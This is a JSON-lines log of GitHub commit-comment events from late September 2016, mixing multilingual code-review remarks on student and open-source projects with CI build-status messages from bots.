{"id":"4634697846","type":"CommitCommentEvent","actor":{"login":"doganmeh"},"repo":{"name":"pivotal-energy-solutions/django-datatable-view"},"payload":{"comment":{"id":19218012,"position":null,"line":null,"path":null,"commit_id":"6b53bfd8342da562073902f0d3df6aa14904e877","created_at":"2016-09-29T02:38:01Z","updated_at":"2016-09-29T02:38:01Z","body":"This fixed issue #141 and also adds little extra functionality, as such: if you have multiple boolean columns (most typical example is the users table: is_staff, is_active, is_superuser etc.) searching 'true' will not help much since most columns will have it. Instead you would like to be able to just filter \"active\" users, or \"staff\" users. "}},"created_at":"2016-09-29T02:38:01Z"}
{"id":"4634698509","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19218019,"position":null,"line":null,"path":null,"commit_id":"33723b471757d30ef9cd4de3fcf826595ced4ee4","created_at":"2016-09-29T02:38:16Z","updated_at":"2016-09-29T02:38:16Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-29T02:38:16Z"}
{"id":"4634699965","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"victoreob/crescer-2016-2"},"payload":{"comment":{"id":19218024,"position":27,"line":27,"path":"Victor/DataTerceiraEra.java","commit_id":"9dad342b4118122174c7169031f55fe4f1b21ad4","created_at":"2016-09-29T02:38:48Z","updated_at":"2016-09-29T02:38:48Z","body":"bacana.. mas tem como ser ainda mais simples.. consegue imaginar?"}},"created_at":"2016-09-29T02:38:48Z"}
{"id":"4634699973","type":"CommitCommentEvent","actor":{"login":"souljocker"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19218025,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-29T02:38:48Z","updated_at":"2016-09-29T02:38:48Z","body":"Se tirar o PZ do tile da porta nao resolve?"}},"created_at":"2016-09-29T02:38:48Z"}
{"id":"4634700744","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"victoreob/crescer-2016-2"},"payload":{"comment":{"id":19218028,"position":null,"line":null,"path":null,"commit_id":"9dad342b4118122174c7169031f55fe4f1b21ad4","created_at":"2016-09-29T02:39:04Z","updated_at":"2016-09-29T02:39:04Z","body":"Adicionar pelo menos mais um caso de teste!"}},"created_at":"2016-09-29T02:39:04Z"}
{"id":"4634705942","type":"CommitCommentEvent","actor":{"login":"murilao"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19218057,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-29T02:40:58Z","updated_at":"2016-09-29T02:40:58Z","body":"Não. Nunca testei mais tem sistema igual global rl que passa por dentro player fora do PZ."}},"created_at":"2016-09-29T02:40:58Z"}
{"id":"4634706046","type":"CommitCommentEvent","actor":{"login":"HeartSaVioR"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":19218058,"position":21,"line":1843,"path":"core/src/main/java/org/apache/calcite/adapter/enumerable/RexImpTable.java","commit_id":"c0aa89b5b02d3d1cd5b2dda8e7164687eae449f0","created_at":"2016-09-29T02:41:01Z","updated_at":"2016-09-29T02:41:01Z","body":"Actually it can return NULL when its value is really null, and we're accessing map which doesn't have matching key. (I might be wrong about map since I didn't see standard SQL mentioning Map.)\r\n\r\nSo even though we follow standard SQL, NullPolicy should be ANY."}},"created_at":"2016-09-29T02:41:01Z"}
{"id":"4634706056","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19218059,"position":null,"line":null,"path":null,"commit_id":"d301a33498a4127f85d29dc905954d8b6c788a87","created_at":"2016-09-29T02:41:01Z","updated_at":"2016-09-29T02:41:01Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Base game logic](https://trello.com/c/ifdDwAaq/4-base-game-logic)"}},"created_at":"2016-09-29T02:41:01Z"}
{"id":"4634707063","type":"CommitCommentEvent","actor":{"login":"HeartSaVioR"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":19218062,"position":21,"line":1843,"path":"core/src/main/java/org/apache/calcite/adapter/enumerable/RexImpTable.java","commit_id":"c0aa89b5b02d3d1cd5b2dda8e7164687eae449f0","created_at":"2016-09-29T02:41:22Z","updated_at":"2016-09-29T02:41:22Z","body":"and -> or"}},"created_at":"2016-09-29T02:41:22Z"}
{"id":"4634707823","type":"CommitCommentEvent","actor":{"login":"doganmeh"},"repo":{"name":"pivotal-energy-solutions/django-datatable-view"},"payload":{"comment":{"id":19218065,"position":6,"line":295,"path":"datatableview/columns.py","commit_id":"6b53bfd8342da562073902f0d3df6aa14904e877","created_at":"2016-09-29T02:41:40Z","updated_at":"2016-09-29T02:41:40Z","body":"The else part that I commented out seemed wrong to me (as it says if term being searched is a single word ignore it for the `in` lookup..). I did not mean to include it in this commit, but realized later on. Should be kept if OK. Search functionality worked fine either way in my experience. "}},"created_at":"2016-09-29T02:41:40Z"}
{"id":"4634712567","type":"CommitCommentEvent","actor":{"login":"hungpq14"},"repo":{"name":"Frozen-Developers/android-cache-cleaner"},"payload":{"comment":{"id":19218075,"position":null,"line":null,"path":null,"commit_id":"1e3b14a24a97af34397be137f5a87a6add5148a0","created_at":"2016-09-29T02:43:22Z","updated_at":"2016-09-29T02:43:22Z","body":"i have a problem here when using method \"freeStorageAndNotify\". i just want to public the progress when the method invoked. is is possible?"}},"created_at":"2016-09-29T02:43:22Z"}
{"id":"4634712594","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19218076,"position":null,"line":null,"path":null,"commit_id":"ae2c2389ad4d3cedf8376cc7d1c1167cd41fa251","created_at":"2016-09-29T02:43:23Z","updated_at":"2016-09-29T02:43:23Z","body":"@MichaelWallace30 \r\nThese Links are intended for swarm communications, but in order to use them, we need to somehow get info about who we are trying to connect to. To do that, we need to send out a signal, looking for who we can connect to..."}},"created_at":"2016-09-29T02:43:23Z"}
{"id":"4634715131","type":"CommitCommentEvent","actor":{"login":"souljocker"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19218085,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-29T02:44:24Z","updated_at":"2016-09-29T02:44:24Z","body":"tendeu"}},"created_at":"2016-09-29T02:44:24Z"}
{"id":"4634717604","type":"CommitCommentEvent","actor":{"login":"melissjs"},"repo":{"name":"melissjs/DC"},"payload":{"comment":{"id":19218088,"position":null,"line":null,"path":null,"commit_id":"59ec3c5e1e5c86715d4c0a49c972d7f64a8b87e3","created_at":"2016-09-29T02:45:17Z","updated_at":"2016-09-29T02:45:17Z","body":"merge this?"}},"created_at":"2016-09-29T02:45:17Z"}
{"id":"4634718318","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218091,"position":null,"line":null,"path":null,"commit_id":"8465204603aa60da0cad00688d384f72d26ce6d4","created_at":"2016-09-29T02:45:34Z","updated_at":"2016-09-29T02:45:34Z","body":"Só cuida pq este commit veio antes da implementação ser commitada. Se alguém baixasse teu código neste exato momento, não compilaria pois o código `ehBissexto` não existe, sacou?"}},"created_at":"2016-09-29T02:45:34Z"}
{"id":"4634719197","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218095,"position":29,"line":24,"path":"src/modulo-01-java-OO/projeto-lotr/DataTerceiraEra.java","commit_id":"526a5469b4f39b0c0b57be0d5212e21450343c49","created_at":"2016-09-29T02:45:52Z","updated_at":"2016-09-29T02:45:52Z","body":"não precisa dos () externos."}},"created_at":"2016-09-29T02:45:52Z"}
{"id":"4634719880","type":"CommitCommentEvent","actor":{"login":"Argalep"},"repo":{"name":"ServUO/ServUO"},"payload":{"comment":{"id":19218098,"position":null,"line":null,"path":null,"commit_id":"255f58c2109edf1e069ee588696233eedc9e783d","created_at":"2016-09-29T02:46:05Z","updated_at":"2016-09-29T02:46:05Z","body":"hi raven,\r\n\r\nplease add to \r\n\r\nif (item is BaseQuiver)\r\n            {\r\n                BaseQuiver quiver = (BaseQuiver)item;\r\n\t\t\t\t\r\n\t\t\t\tif (quiver.SetID != SetItem.None)\r\n                    return false;\r\n\r\n                if (quiver.IsArtifact)\r\n                    return false;\r\n            }"}},"created_at":"2016-09-29T02:46:05Z"}
{"id":"4634733593","type":"CommitCommentEvent","actor":{"login":"cmaloney"},"repo":{"name":"dcos/adminrouter"},"payload":{"comment":{"id":19218124,"position":13,"line":59,"path":"nginx.master.conf","commit_id":"6c7c97a3bb46cb87f6ba5dec98c68b790a3349a8","created_at":"2016-09-29T02:50:59Z","updated_at":"2016-09-29T02:50:59Z","body":"In time yes. Currently spdy via nginx has lots of breaking bugs they keep releasing new versions for.\r\n\r\nPractically nothing other than http 1.1 was ever tested, and there were a number of instances where http2 and spdy being selected instead of http 1.1 caused weird bugs"}},"created_at":"2016-09-29T02:50:59Z"}
{"id":"4634733658","type":"CommitCommentEvent","actor":{"login":"kwkbtr"},"repo":{"name":"vivliostyle/vivliostyle-ui"},"payload":{"comment":{"id":19218125,"position":31,"line":311,"path":"test/spec/viewmodels/navigation-spec.js","commit_id":"413b12226f1d7a99607c2369720c37f0a72079a4","created_at":"2016-09-29T02:51:01Z","updated_at":"2016-09-29T02:51:01Z","body":"This expectation would be satisfied even if `zoomIn()` call just before it (L309), since `viewer.queryZoomFactor` is already called from the previous `zoomIn()` call (L302) and the same spy is used."}},"created_at":"2016-09-29T02:51:01Z"}
{"id":"4634734583","type":"CommitCommentEvent","actor":{"login":"lyhcode"},"repo":{"name":"trunk-studio/cargocms"},"payload":{"comment":{"id":19218127,"position":46,"line":50,"path":"config/init/labfnp/index.js","commit_id":"484df760564cce086428399afd855c01c27ec2cf","created_at":"2016-09-29T02:51:22Z","updated_at":"2016-09-29T02:51:22Z","body":"這一行的寫法太雷"}},"created_at":"2016-09-29T02:51:22Z"}
{"id":"4634734796","type":"CommitCommentEvent","actor":{"login":"cmaloney"},"repo":{"name":"dcos/adminrouter"},"payload":{"comment":{"id":19218128,"position":13,"line":59,"path":"nginx.master.conf","commit_id":"6c7c97a3bb46cb87f6ba5dec98c68b790a3349a8","created_at":"2016-09-29T02:51:26Z","updated_at":"2016-09-29T02:51:26Z","body":"http2 via nginx*"}},"created_at":"2016-09-29T02:51:26Z"}
{"id":"4634735766","type":"CommitCommentEvent","actor":{"login":"chharvey"},"repo":{"name":"sintaxi/harp"},"payload":{"comment":{"id":19218131,"position":null,"line":null,"path":null,"commit_id":"09ba70875869f00ecb37938470a69bf7ac5445e8","created_at":"2016-09-29T02:51:47Z","updated_at":"2016-09-29T02:51:47Z","body":"good work, this appears to fix #561"}},"created_at":"2016-09-29T02:51:47Z"}
{"id":"4634738357","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218137,"position":6,"line":4,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"66778a39f0acc6d16c4f8f2d699b3f4c28ba37dc","created_at":"2016-09-29T02:52:41Z","updated_at":"2016-09-29T02:52:41Z","body":"Não precisa do `= 0`;"}},"created_at":"2016-09-29T02:52:41Z"}
{"id":"4634739862","type":"CommitCommentEvent","actor":{"login":"RyujiTada"},"repo":{"name":"RyujiTada/test_Project"},"payload":{"comment":{"id":19218141,"position":null,"line":null,"path":null,"commit_id":"b3c2a5ec31fbd807357fad7303ba3a8e6c23e458","created_at":"2016-09-29T02:53:14Z","updated_at":"2016-09-29T02:53:14Z","body":"test"}},"created_at":"2016-09-29T02:53:14Z"}
{"id":"4634741381","type":"CommitCommentEvent","actor":{"login":"snoopy831002"},"repo":{"name":"snoopy831002/raytracing"},"payload":{"comment":{"id":19218146,"position":null,"line":null,"path":null,"commit_id":"539281287cd609ef97a66d036fdd367333d678dc","created_at":"2016-09-29T02:53:47Z","updated_at":"2016-09-29T02:53:47Z","body":"understood!"}},"created_at":"2016-09-29T02:53:47Z"}
{"id":"4634741903","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-responsive"},"payload":{"comment":{"id":19218148,"position":365,"line":365,"path":"Assignment/starter_code/css/style.css","commit_id":"94ed9eaf829df5bf75bac63f821b64ef5d7d9f3f","created_at":"2016-09-29T02:53:59Z","updated_at":"2016-09-29T02:53:59Z","body":"Nice touch adding a transition!"}},"created_at":"2016-09-29T02:53:59Z"}
{"id":"4634742352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218149,"position":null,"line":null,"path":null,"commit_id":"a8ba8a796f02929fc32e477fe9002522bd8994ed","created_at":"2016-09-29T02:54:10Z","updated_at":"2016-09-29T02:54:10Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T02:54:10Z"}
{"id":"4634742366","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"jasonwynn10/MyPlot"},"payload":{"comment":{"id":19218150,"position":null,"line":null,"path":null,"commit_id":"e5140c5fc45ed9d8f6f2ec3ce615b302ec65032e","created_at":"2016-09-29T02:54:11Z","updated_at":"2016-09-29T02:54:11Z","body":"I'll test."}},"created_at":"2016-09-29T02:54:11Z"}
{"id":"4634744433","type":"CommitCommentEvent","actor":{"login":"vipakun"},"repo":{"name":"video-react/video-react"},"payload":{"comment":{"id":19218154,"position":null,"line":null,"path":null,"commit_id":"118da78bee85cdee6f504ab80aefee8e8be96748","created_at":"2016-09-29T02:54:51Z","updated_at":"2016-09-29T02:54:51Z","body":"新项目？"}},"created_at":"2016-09-29T02:54:51Z"}
{"id":"4634746448","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-responsive"},"payload":{"comment":{"id":19218157,"position":1,"line":1,"path":"Assignment/starter_code/js/index.js","commit_id":"94ed9eaf829df5bf75bac63f821b64ef5d7d9f3f","created_at":"2016-09-29T02:55:34Z","updated_at":"2016-09-29T02:55:34Z","body":"Excellent job adding the collapsed menu for the mobile version!"}},"created_at":"2016-09-29T02:55:34Z"}
{"id":"4634748355","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19218159,"position":null,"line":null,"path":null,"commit_id":"784498d4b0400b0b4f4e2f57dcb54af8a99752a0","created_at":"2016-09-29T02:56:13Z","updated_at":"2016-09-29T02:56:13Z","body":"For now..."}},"created_at":"2016-09-29T02:56:13Z"}
{"id":"4634748462","type":"CommitCommentEvent","actor":{"login":"HeartSaVioR"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":19218160,"position":21,"line":1843,"path":"core/src/main/java/org/apache/calcite/adapter/enumerable/RexImpTable.java","commit_id":"c0aa89b5b02d3d1cd5b2dda8e7164687eae449f0","created_at":"2016-09-29T02:56:15Z","updated_at":"2016-09-29T02:56:15Z","body":"Easiest scenaio is nullable value type on array or map."}},"created_at":"2016-09-29T02:56:15Z"}
{"id":"4634751399","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-responsive"},"payload":{"comment":{"id":19218168,"position":354,"line":354,"path":"Assignment/starter_code/css/style.css","commit_id":"94ed9eaf829df5bf75bac63f821b64ef5d7d9f3f","created_at":"2016-09-29T02:57:17Z","updated_at":"2016-09-29T02:57:17Z","body":"Great job on your CSS, try to watch your indenting though and make sure it all flows properly. The bigger your projects get the easier it will be to read your code if it is indented properly."}},"created_at":"2016-09-29T02:57:17Z"}
{"id":"4634752406","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218171,"position":35,"line":29,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"66778a39f0acc6d16c4f8f2d699b3f4c28ba37dc","created_at":"2016-09-29T02:57:39Z","updated_at":"2016-09-29T02:57:39Z","body":"seria mais simples se este `else if` negasse a lógica de ser bissexto, não?"}},"created_at":"2016-09-29T02:57:39Z"}
{"id":"4634752920","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218172,"position":41,"line":77,"path":"school_manager/application/controllers/Sinhvien.php","commit_id":"14b6f1d389efba4c52d097e3328e451f505187cc","created_at":"2016-09-29T02:57:50Z","updated_at":"2016-09-29T02:57:50Z","body":"Change luôn \"sinhvien\" thành \"student\""}},"created_at":"2016-09-29T02:57:50Z"}
{"id":"4634753215","type":"CommitCommentEvent","actor":{"login":"fredrb"},"repo":{"name":"fredrb/spaceExplorer"},"payload":{"comment":{"id":19218173,"position":null,"line":null,"path":null,"commit_id":"15fa388a253c9cfc73ed662e3f7eda7c1552ced7","created_at":"2016-09-29T02:57:57Z","updated_at":"2016-09-29T02:57:57Z","body":"Boa!"}},"created_at":"2016-09-29T02:57:57Z"}
{"id":"4634754487","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19218175,"position":38,"line":32,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"66778a39f0acc6d16c4f8f2d699b3f4c28ba37dc","created_at":"2016-09-29T02:58:24Z","updated_at":"2016-09-29T02:58:24Z","body":"one-liner solution pra simplificar:\r\n\r\n```Java\r\nvalorRetorno = valorRetorno * 33 % 100;\r\n```"}},"created_at":"2016-09-29T02:58:24Z"}
{"id":"4634755110","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218177,"position":5,"line":6,"path":"school_manager/application/views/frontend/layout/addstudent.php","commit_id":"14b6f1d389efba4c52d097e3328e451f505187cc","created_at":"2016-09-29T02:58:37Z","updated_at":"2016-09-29T02:58:37Z","body":"localhost là không đúng nhé. "}},"created_at":"2016-09-29T02:58:37Z"}
{"id":"4634755982","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218180,"position":7,"line":8,"path":"school_manager/application/views/frontend/layout/addstudent.php","commit_id":"14b6f1d389efba4c52d097e3328e451f505187cc","created_at":"2016-09-29T02:58:56Z","updated_at":"2016-09-29T02:58:56Z","body":"Dùng tiếng Anh, không dùng tiếng Việt. "}},"created_at":"2016-09-29T02:58:56Z"}
{"id":"4634756821","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"cuongpv93/school_manager"},"payload":{"comment":{"id":19218182,"position":5,"line":6,"path":"school_manager/application/views/frontend/layout/deletestudent.php","commit_id":"14b6f1d389efba4c52d097e3328e451f505187cc","created_at":"2016-09-29T02:59:15Z","updated_at":"2016-09-29T02:59:15Z","body":"localhost!"}},"created_at":"2016-09-29T02:59:15Z"}
{"id":"4634757960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218184,"position":null,"line":null,"path":null,"commit_id":"a8ba8a796f02929fc32e477fe9002522bd8994ed","created_at":"2016-09-29T02:59:39Z","updated_at":"2016-09-29T02:59:39Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T02:59:39Z"}
{"id":"4634758459","type":"CommitCommentEvent","actor":{"login":"thanhgis"},"repo":{"name":"thanhgis/QGIS-Vietnamese-Encodings-Converter"},"payload":{"comment":{"id":19218185,"position":null,"line":null,"path":null,"commit_id":"2be7b1f98d1c84506036778089c55036589ed7d9","created_at":"2016-09-29T02:59:51Z","updated_at":"2016-09-29T02:59:51Z","body":"Moved metadata and __init__"}},"created_at":"2016-09-29T02:59:51Z"}
{"id":"4639591862","type":"CommitCommentEvent","actor":{"login":"mojilat"},"repo":{"name":"mojilat/-"},"payload":{"comment":{"id":19230039,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T20:00:25Z","updated_at":"2016-09-29T20:00:25Z","body":"Mojilat"}},"created_at":"2016-09-29T20:00:25Z"}
{"id":"4639593170","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19230043,"position":6,"line":1297,"path":"chat-plugins/info.js","commit_id":"6b077d94532170ff0d9617e2fb04738c4e607592","created_at":"2016-09-29T20:00:38Z","updated_at":"2016-09-29T20:00:38Z","body":"Yeah, I'll do it tonight."}},"created_at":"2016-09-29T20:00:38Z"}
{"id":"4639596748","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230049,"position":null,"line":null,"path":null,"commit_id":"fade26838e5ae941dac09500550f8c6b90ea35a2","created_at":"2016-09-29T20:01:14Z","updated_at":"2016-09-29T20:01:14Z","body":"TeamCity Units.NET :: Build and Test [Build 163](http://teamcity.chump.work/viewLog.html?buildId=715&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-29T20:01:14Z"}
{"id":"4639597367","type":"CommitCommentEvent","actor":{"login":"OliverJAsh"},"repo":{"name":"BrowserSync/browser-sync"},"payload":{"comment":{"id":19230050,"position":null,"line":null,"path":null,"commit_id":"27a08c2aad477922ab01aa979100f56cfe89c10c","created_at":"2016-09-29T20:01:20Z","updated_at":"2016-09-29T20:01:20Z","body":"Don't we want to specify the type so it appears in `--help` etc?"}},"created_at":"2016-09-29T20:01:20Z"}
{"id":"4639597967","type":"CommitCommentEvent","actor":{"login":"nickthetait"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19230051,"position":null,"line":null,"path":null,"commit_id":"7f723632ea19576ef7c501e054192e2dcfad5a17","created_at":"2016-09-29T20:01:27Z","updated_at":"2016-09-29T20:01:27Z","body":"Nice, I think this will help reduce a bunch of confusion :+1: "}},"created_at":"2016-09-29T20:01:27Z"}
{"id":"4639599208","type":"CommitCommentEvent","actor":{"login":"AlexLartsev19"},"repo":{"name":"AlexLartsev19/blood_kernel_meizu_m2note"},"payload":{"comment":{"id":19230054,"position":null,"line":null,"path":null,"commit_id":"91d4af3a857f9e1df4b7f18b6324bfc479c7adb4","created_at":"2016-09-29T20:01:40Z","updated_at":"2016-09-29T20:01:40Z","body":"Hi,\r\n\r\nBut after this commit smartphone works more fastly... *_*"}},"created_at":"2016-09-29T20:01:40Z"}
{"id":"4639599539","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230055,"position":null,"line":null,"path":null,"commit_id":"fade26838e5ae941dac09500550f8c6b90ea35a2","created_at":"2016-09-29T20:01:43Z","updated_at":"2016-09-29T20:01:43Z","body":"TeamCity Units.NET :: Build and Test [Build 163](http://teamcity.chump.work/viewLog.html?buildId=715&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:29"}},"created_at":"2016-09-29T20:01:43Z"}
{"id":"4639600672","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230060,"position":null,"line":null,"path":null,"commit_id":"fade26838e5ae941dac09500550f8c6b90ea35a2","created_at":"2016-09-29T20:01:54Z","updated_at":"2016-09-29T20:01:54Z","body":"TeamCity Units.NET :: Publish NuGets [Build 163](http://teamcity.chump.work/viewLog.html?buildId=717&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-29T20:01:54Z"}
{"id":"4639602010","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230061,"position":null,"line":null,"path":null,"commit_id":"fade26838e5ae941dac09500550f8c6b90ea35a2","created_at":"2016-09-29T20:02:09Z","updated_at":"2016-09-29T20:02:09Z","body":"TeamCity Units.NET :: Publish NuGets [Build 163](http://teamcity.chump.work/viewLog.html?buildId=717&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:14"}},"created_at":"2016-09-29T20:02:09Z"}
{"id":"4639606163","type":"CommitCommentEvent","actor":{"login":"ChuckMac"},"repo":{"name":"ChuckMac/ninja-forms-acf-field"},"payload":{"comment":{"id":19230068,"position":null,"line":null,"path":null,"commit_id":"7781d4d848fc86e6a8f3fe0bc1390776d32abeb7","created_at":"2016-09-29T20:02:48Z","updated_at":"2016-09-29T20:02:48Z","body":"Fixes #4 "}},"created_at":"2016-09-29T20:02:48Z"}
{"id":"4639607502","type":"CommitCommentEvent","actor":{"login":"jirikolarik"},"repo":{"name":"werein/react"},"payload":{"comment":{"id":19230073,"position":null,"line":null,"path":null,"commit_id":"49387a6b5680c14c64308108418420ed8ff14ca0","created_at":"2016-09-29T20:03:03Z","updated_at":"2016-09-29T20:03:03Z","body":"I'd have definitely help you out, if you would be more polite, but you know what? I'll not"}},"created_at":"2016-09-29T20:03:03Z"}
{"id":"4639612338","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230082,"position":null,"line":null,"path":null,"commit_id":"984311faba99b80c25d1431cfb7ef771c131972d","created_at":"2016-09-29T20:03:55Z","updated_at":"2016-09-29T20:03:55Z","body":"TeamCity Units.NET :: Build and Test [Build 164](http://teamcity.chump.work/viewLog.html?buildId=718&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-29T20:03:55Z"}
{"id":"4639613138","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19230084,"position":null,"line":null,"path":null,"commit_id":"b681bffc247ebac1fbb4afcec03e2ce12627e0cc","created_at":"2016-09-29T20:04:05Z","updated_at":"2016-09-29T20:04:05Z","body":":trollface: "}},"created_at":"2016-09-29T20:04:05Z"}
{"id":"4639614449","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230086,"position":null,"line":null,"path":null,"commit_id":"984311faba99b80c25d1431cfb7ef771c131972d","created_at":"2016-09-29T20:04:19Z","updated_at":"2016-09-29T20:04:19Z","body":"TeamCity Units.NET :: Build and Test [Build 164](http://teamcity.chump.work/viewLog.html?buildId=718&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:24"}},"created_at":"2016-09-29T20:04:19Z"}
{"id":"4639616527","type":"CommitCommentEvent","actor":{"login":"chenhe95"},"repo":{"name":"chenhe95/scikit-learn"},"payload":{"comment":{"id":19230090,"position":null,"line":null,"path":null,"commit_id":"2f8ae0b099988c2b7fe125307f42b35dbe979d98","created_at":"2016-09-29T20:04:43Z","updated_at":"2016-09-29T20:04:43Z","body":"WIP I am still trying to figure out how to properly add in the reference to /doc/datasets/index.rst#loading-from-external-datasets"}},"created_at":"2016-09-29T20:04:43Z"}
{"id":"4639617678","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19230092,"position":null,"line":null,"path":null,"commit_id":"cbc4b3774e5fa9c8bdc84dbe68784e42fb2d4dff","created_at":"2016-09-29T20:04:56Z","updated_at":"2016-09-29T20:04:56Z","body":"TeamCity Units.NET :: Build and Test [Build 165](http://teamcity.chump.work/viewLog.html?buildId=719&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-29T20:04:56Z"}
